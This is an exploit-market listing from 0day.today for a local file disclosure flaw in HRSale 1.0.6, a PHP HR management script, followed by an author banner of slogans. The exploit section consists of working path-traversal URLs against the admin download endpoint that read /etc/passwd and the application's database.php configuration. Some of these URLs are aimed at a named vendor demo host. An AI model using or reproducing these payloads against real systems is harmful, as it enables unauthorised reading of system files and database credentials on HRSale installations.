[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

HRSale 1.0.6 Local File Disclosure Vulnerability

Author
ShanoWeb
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-30807
Category
web applications
Date add
01-08-2018
Platform
php
# Exploit Title: HRSALE - HR Management PHP Script - LFD
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: http://hrsale.com
# Software Buy: https://www.codester.com/items/8599/hrsale-hr-management-php-script
# Demo: http://newdemo.hrsale.com/
# Version: 1.0.6
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
http://[target]/admin/download?type=files&filename=../../../../../../etc/passwd
database:
http://[target]/admin/download?type=files&filename=../../application/config/database.php
ex:
http://newdemo.hrsale.com/admin/download?type=files&filename=../../../../../../etc/passwd
http://newdemo.hrsale.com/admin/download?type=files&filename=../../application/config/database.php
:D

./
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
| Find and patch bug in your website and system|
| Contact    : Mr[dot]Net2Net[at]Gmail[dot]com |
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|

|=============================================================|
/-------------------------------------------------------------\
|                         My Message To                       |
\-------------------------------------------------------------/
|= [!] Make Love,Not  War!. Peace No War!
|= [!] We Are One!
|= [!] We are Legion,We do not Forgive,We Do not Forge
|= [!] We Love All Children from Palestine
|=============================================================|

#  0day.today [2024-11-15]  #